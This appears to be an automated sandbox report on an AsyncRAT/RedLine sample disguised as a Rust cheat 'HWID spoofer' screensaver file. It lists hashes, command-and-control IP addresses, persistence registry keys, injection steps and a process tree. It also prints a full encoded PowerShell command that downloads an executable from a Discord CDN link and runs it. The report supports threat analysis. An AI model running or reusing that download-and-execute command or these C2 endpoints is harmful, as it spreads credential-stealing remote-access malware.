asyncrat | d016fcbdb988d56df4c26d75a12e87a61010ed2366b52eefb8b409a1d8bcbaab

Resubmissions

08-04-2023 15:54

230408-tcfdvsdh99 7

28-01-2023 14:39

28-01-2023 12:12

28-01-2023 11:33

28-01-2023 11:17

Analysis

max time kernel
179s
max time network
180s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
28-01-2023 12:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Hwid Spoofer Eac Rust Cleaner‮nls..scr
Size

658KB
MD5

556084cf64aec63e0babdf10a61afaa6
SHA1

b7fa21295db0657d1767c05bb440b218cecdf521
SHA256

d016fcbdb988d56df4c26d75a12e87a61010ed2366b52eefb8b409a1d8bcbaab
SHA512

6c896594ea47228f71f1dea7d9fd9f9842b5f178748a39c785ded34fb9dfd574c9bd781f1f65176e436453257078255803d729b79d823c01c6629fddfb3ce33e
SSDEEP

12288:LC/74rdbHgVBnqvFprkrUolVATWZXYm7ljg9hG80NEKXo1Y1UHC+O:LC/UGTWrkrUovUKfhkQNEwUnO

Score

10^/10

asyncrat redline defendersmartscren ff securityhealthservice system guard runtime whostprojess windoosdguard discovery infostealer persistence rat spyware stealer upx

Malware Config

Extracted

Family

redline

Botnet

51.103.208.104:53200

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

WHostProjess

95.70.151.185:8805

Mutex

WHostProjess

Attributes

delay
3
install
false
install_file
WHostProjess
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

SecurityHealthService

20.4.6.16:43521

Mutex

SecurityHealthService

Attributes

delay
3
install
false
install_file
SecurityHealthService
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

WindoosDGuard

20.4.6.16:43521

Mutex

WindoosDGuard

Attributes

delay
3
install
false
install_file
WindoosDGuard
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes

delay
3
install
false
install_file
SecurityHealtheurvice.exe
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3404-157-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

Async RAT payload 5 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/5984-278-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/2716-326-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/3412-372-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/5528-380-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/5496-388-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
45	2468	powershell.exe
57	4896	powershell.exe
61	5036	powershell.exe
67	1804	powershell.exe
68	3552	powershell.exe
71	1028	powershell.exe
74	4360	powershell.exe
75	1628	powershell.exe
79	5244	powershell.exe
82	4520	powershell.exe
87	1276	powershell.exe
89	5280	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 30 IoCs

Processes:

HJDS32.EXE0.exeh8vHNS7mlJ.exe1VJRcYlIp3.exeCSiI2cJakt.exeHHARrI0l8D.exeDs1LDOEyjt.exeGjKI4UESBN.exexhE0ft0B5U.exeS48sKmJLIF.exeTBvbn5FGMT.exepI7A0t4Z9N.exewhwbnynKNT.exe1kpScgE4PS.exe2.exe3.exe4.exe5.exe5.exe6.exe7.exe8.exe9.exe10.exe11.exe3.exe12.exe13.exe6.exe

pid	process
2012	HJDS32.EXE
4968	0.exe
1608	h8vHNS7mlJ.exe
2744	1VJRcYlIp3.exe
2640	CSiI2cJakt.exe
4792	HHARrI0l8D.exe
3508	Ds1LDOEyjt.exe
2236	GjKI4UESBN.exe
2652	xhE0ft0B5U.exe
1316	S48sKmJLIF.exe
1592	TBvbn5FGMT.exe
4532	pI7A0t4Z9N.exe
2652	xhE0ft0B5U.exe
1652	whwbnynKNT.exe
4784	1kpScgE4PS.exe
5868	2.exe
5180	3.exe
4564	4.exe
2280	5.exe
5948	5.exe
5868	6.exe
4836	7.exe
5144	8.exe
5216	9.exe
3824	10.exe
5880	11.exe
2768	3.exe
4592	12.exe
2468	13.exe
3192	6.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\HJDS32.EXE	upx
C:\Users\Admin\AppData\Roaming\HJDS32.EXE	upx
behavioral1/memory/2012-143-0x00007FF71DB30000-0x00007FF71DC8F000-memory.dmp	upx
behavioral1/memory/2012-146-0x00007FF71DB30000-0x00007FF71DC8F000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\0.exe	upx
C:\Users\Admin\AppData\Local\Temp\0.exe	upx
behavioral1/memory/4968-150-0x00007FF68BF60000-0x00007FF68C0C1000-memory.dmp	upx
behavioral1/memory/4968-238-0x00007FF68BF60000-0x00007FF68C0C1000-memory.dmp	upx

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RegAsm.exeDs1LDOEyjt.exeGjKI4UESBN.exexhE0ft0B5U.exeTBvbn5FGMT.exe1kpScgE4PS.exewhwbnynKNT.exe1VJRcYlIp3.exeCSiI2cJakt.exeHHARrI0l8D.exeS48sKmJLIF.exepI7A0t4Z9N.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	Ds1LDOEyjt.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	GjKI4UESBN.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	xhE0ft0B5U.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	TBvbn5FGMT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	1kpScgE4PS.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	whwbnynKNT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	1VJRcYlIp3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	CSiI2cJakt.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	HHARrI0l8D.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	S48sKmJLIF.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	pI7A0t4Z9N.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exepowershell.exe5.exe7.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WHost = "C:\\Users\\Admin\\AppData\\Roaming\\WHost\\WHost.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\zXQYDaStND = "C:\\Users\\Admin\\AppData\\Roaming\\yQKALotXEZ\\wXDStJGKiy.exe"	5.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe"	7.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 12 IoCs

Processes:

Hwid Spoofer Eac Rust Cleaner‮nls..scrh8vHNS7mlJ.exe2.exe4.exe5.exe3.exe6.exe10.exe13.exe11.exe3.exe12.exe

description	pid	process	target process
PID 1480 set thread context of 2264	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1608 set thread context of 3404	1608	h8vHNS7mlJ.exe	RegAsm.exe
PID 5868 set thread context of 5984	5868	2.exe	RegAsm.exe
PID 4564 set thread context of 2716	4564	4.exe	RegAsm.exe
PID 2280 set thread context of 5948	2280	5.exe	5.exe
PID 5180 set thread context of 5916	5180	3.exe	RegAsm.exe
PID 5868 set thread context of 3412	5868	6.exe	RegAsm.exe
PID 3824 set thread context of 5528	3824	10.exe	RegAsm.exe
PID 2468 set thread context of 5496	2468	13.exe	RegAsm.exe
PID 5880 set thread context of 5704	5880	11.exe	RegAsm.exe
PID 2768 set thread context of 5756	2768	3.exe	RegAsm.exe
PID 4592 set thread context of 5104	4592	12.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5176 5144 WerFault.exe 8.exe

pid	pid_target	process	target process
5176	5144	WerFault.exe	8.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

6096 schtasks.exe
4772 schtasks.exe
1876 schtasks.exe
1168 schtasks.exe

pid	process
6096	schtasks.exe
4772	schtasks.exe
1876	schtasks.exe
1168	schtasks.exe

Modifies registry class 3 IoCs

Processes:

RegAsm.exeOpenWith.exetaskmgr.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Hwid Spoofer Eac Rust Cleaner‮nls..scrpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRegAsm.exe

pid	process
1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr
1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr
2468	powershell.exe
2468	powershell.exe
4896	powershell.exe
4896	powershell.exe
5036	powershell.exe
5036	powershell.exe
1804	powershell.exe
1804	powershell.exe
2468	powershell.exe
2468	powershell.exe
3552	powershell.exe
3552	powershell.exe
4896	powershell.exe
4896	powershell.exe
1804	powershell.exe
5036	powershell.exe
5036	powershell.exe
1028	powershell.exe
1028	powershell.exe
4360	powershell.exe
4360	powershell.exe
3552	powershell.exe
1628	powershell.exe
1628	powershell.exe
4036	taskmgr.exe
4036	taskmgr.exe
4520	powershell.exe
4520	powershell.exe
1276	powershell.exe
1276	powershell.exe
1028	powershell.exe
4520	powershell.exe
4360	powershell.exe
1628	powershell.exe
5244	powershell.exe
5244	powershell.exe
5280	powershell.exe
5280	powershell.exe
4036	taskmgr.exe
1276	powershell.exe
5244	powershell.exe
5280	powershell.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
5920	powershell.exe
5920	powershell.exe
5920	powershell.exe
4036	taskmgr.exe
3404	RegAsm.exe
3404	RegAsm.exe
3404	RegAsm.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

4036 taskmgr.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

Processes:

Hwid Spoofer Eac Rust Cleaner‮nls..scrpowershell.exeRegAsm.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe5.exe3.exe6.exepowershell.exepowershell.exe11.exe3.exe12.exe

description	pid	process
Token: SeDebugPrivilege	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeDebugPrivilege	3404	RegAsm.exe
Token: SeDebugPrivilege	4896	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	1804	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	1028	powershell.exe
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	4036	taskmgr.exe
Token: SeSystemProfilePrivilege	4036	taskmgr.exe
Token: SeCreateGlobalPrivilege	4036	taskmgr.exe
Token: SeDebugPrivilege	4520	powershell.exe
Token: SeDebugPrivilege	1276	powershell.exe
Token: SeDebugPrivilege	5244	powershell.exe
Token: SeDebugPrivilege	5280	powershell.exe
Token: SeDebugPrivilege	5920	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	2280	5.exe
Token: SeDebugPrivilege	5180	3.exe
Token: SeDebugPrivilege	5868	6.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	5896	powershell.exe
Token: SeDebugPrivilege	5880	11.exe
Token: SeDebugPrivilege	2768	3.exe
Token: SeDebugPrivilege	4592	12.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe
4036	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

OpenWith.exe

pid process

388 OpenWith.exe

pid	process
388	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Hwid Spoofer Eac Rust Cleaner‮nls..scrRegAsm.exeHJDS32.EXEcmd.exe0.execmd.exeh8vHNS7mlJ.execmd.execmd.exe1VJRcYlIp3.execmd.exeCSiI2cJakt.execmd.exeHHARrI0l8D.execmd.exeDs1LDOEyjt.exe

description	pid	process	target process
PID 1480 wrote to memory of 1036	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1480 wrote to memory of 1036	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1480 wrote to memory of 1036	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1480 wrote to memory of 2264	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1480 wrote to memory of 2264	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1480 wrote to memory of 2264	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1480 wrote to memory of 2264	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1480 wrote to memory of 2264	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1480 wrote to memory of 2264	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1480 wrote to memory of 2264	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1480 wrote to memory of 2264	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1480 wrote to memory of 2264	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 1480 wrote to memory of 2264	1480	Hwid Spoofer Eac Rust Cleaner‮nls..scr	RegAsm.exe
PID 2264 wrote to memory of 2012	2264	RegAsm.exe	HJDS32.EXE
PID 2264 wrote to memory of 2012	2264	RegAsm.exe	HJDS32.EXE
PID 2012 wrote to memory of 4292	2012	HJDS32.EXE	cmd.exe
PID 2012 wrote to memory of 4292	2012	HJDS32.EXE	cmd.exe
PID 4292 wrote to memory of 4968	4292	cmd.exe	0.exe
PID 4292 wrote to memory of 4968	4292	cmd.exe	0.exe
PID 4968 wrote to memory of 2704	4968	0.exe	cmd.exe
PID 4968 wrote to memory of 2704	4968	0.exe	cmd.exe
PID 2704 wrote to memory of 1608	2704	cmd.exe	h8vHNS7mlJ.exe
PID 2704 wrote to memory of 1608	2704	cmd.exe	h8vHNS7mlJ.exe
PID 2704 wrote to memory of 1608	2704	cmd.exe	h8vHNS7mlJ.exe
PID 1608 wrote to memory of 3404	1608	h8vHNS7mlJ.exe	RegAsm.exe
PID 1608 wrote to memory of 3404	1608	h8vHNS7mlJ.exe	RegAsm.exe
PID 1608 wrote to memory of 3404	1608	h8vHNS7mlJ.exe	RegAsm.exe
PID 1608 wrote to memory of 3404	1608	h8vHNS7mlJ.exe	RegAsm.exe
PID 1608 wrote to memory of 3404	1608	h8vHNS7mlJ.exe	RegAsm.exe
PID 1608 wrote to memory of 3404	1608	h8vHNS7mlJ.exe	RegAsm.exe
PID 1608 wrote to memory of 3404	1608	h8vHNS7mlJ.exe	RegAsm.exe
PID 1608 wrote to memory of 3404	1608	h8vHNS7mlJ.exe	RegAsm.exe
PID 4968 wrote to memory of 4192	4968	0.exe	cmd.exe
PID 4968 wrote to memory of 4192	4968	0.exe	cmd.exe
PID 4192 wrote to memory of 2744	4192	cmd.exe	1VJRcYlIp3.exe
PID 4192 wrote to memory of 2744	4192	cmd.exe	1VJRcYlIp3.exe
PID 4968 wrote to memory of 3408	4968	0.exe	cmd.exe
PID 4968 wrote to memory of 3408	4968	0.exe	cmd.exe
PID 3408 wrote to memory of 2640	3408	cmd.exe	CSiI2cJakt.exe
PID 3408 wrote to memory of 2640	3408	cmd.exe	CSiI2cJakt.exe
PID 4968 wrote to memory of 512	4968	0.exe	cmd.exe
PID 4968 wrote to memory of 512	4968	0.exe	cmd.exe
PID 2744 wrote to memory of 2468	2744	1VJRcYlIp3.exe	powershell.exe
PID 2744 wrote to memory of 2468	2744	1VJRcYlIp3.exe	powershell.exe
PID 4968 wrote to memory of 1396	4968	0.exe	cmd.exe
PID 4968 wrote to memory of 1396	4968	0.exe	cmd.exe
PID 512 wrote to memory of 4792	512	cmd.exe	HHARrI0l8D.exe
PID 512 wrote to memory of 4792	512	cmd.exe	HHARrI0l8D.exe
PID 2640 wrote to memory of 4896	2640	CSiI2cJakt.exe	powershell.exe
PID 2640 wrote to memory of 4896	2640	CSiI2cJakt.exe	powershell.exe
PID 4968 wrote to memory of 4016	4968	0.exe	cmd.exe
PID 4968 wrote to memory of 4016	4968	0.exe	cmd.exe
PID 1396 wrote to memory of 3508	1396	cmd.exe	Ds1LDOEyjt.exe
PID 1396 wrote to memory of 3508	1396	cmd.exe	Ds1LDOEyjt.exe
PID 4968 wrote to memory of 1344	4968	0.exe	cmd.exe
PID 4968 wrote to memory of 1344	4968	0.exe	cmd.exe
PID 4792 wrote to memory of 5036	4792	HHARrI0l8D.exe	powershell.exe
PID 4792 wrote to memory of 5036	4792	HHARrI0l8D.exe	powershell.exe
PID 4016 wrote to memory of 2236	4016	cmd.exe	GjKI4UESBN.exe
PID 4016 wrote to memory of 2236	4016	cmd.exe	GjKI4UESBN.exe
PID 4968 wrote to memory of 3412	4968	0.exe	cmd.exe
PID 4968 wrote to memory of 3412	4968	0.exe	cmd.exe
PID 3508 wrote to memory of 1804	3508	Ds1LDOEyjt.exe	powershell.exe
PID 3508 wrote to memory of 1804	3508	Ds1LDOEyjt.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Hwid Spoofer Eac Rust Cleaner‮nls..scr
"C:\Users\Admin\AppData\Local\Temp\Hwid Spoofer Eac Rust Cleaner‮nls..scr" /S
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
2⤵
PID:1036

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2264

C:\Users\Admin\AppData\Roaming\HJDS32.EXE
"C:\Users\Admin\AppData\Roaming\HJDS32.EXE"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2012

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4292

C:\Users\Admin\AppData\Local\Temp\0.exe
C:\Users\Admin\AppData\Local\Temp\0.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4968

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\h8vHNS7mlJ.exe
6⤵
- Suspicious use of WriteProcessMemory
PID:2704

C:\Users\Admin\AppData\Local\Temp\h8vHNS7mlJ.exe
C:\Users\Admin\AppData\Local\Temp\h8vHNS7mlJ.exe
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1608

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3404

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\1VJRcYlIp3.exe
6⤵
- Suspicious use of WriteProcessMemory
PID:4192

C:\Users\Admin\AppData\Local\Temp\1VJRcYlIp3.exe
C:\Users\Admin\AppData\Local\Temp\1VJRcYlIp3.exe
7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAegBiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAyADYAMwAzADkAMAA5ADkAMAAzADYANgAvAFcASABvAHMAdAAuAGUAeABlACcALAAgADwAIwB0AGMAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AagB3ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGoAcAB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAKQA8ACMAdgBrAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgByAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAegBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAPAAjAHgAagB1ACMAPgA="
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468

C:\Users\Admin\AppData\Roaming\2.exe
"C:\Users\Admin\AppData\Roaming\2.exe"
9⤵
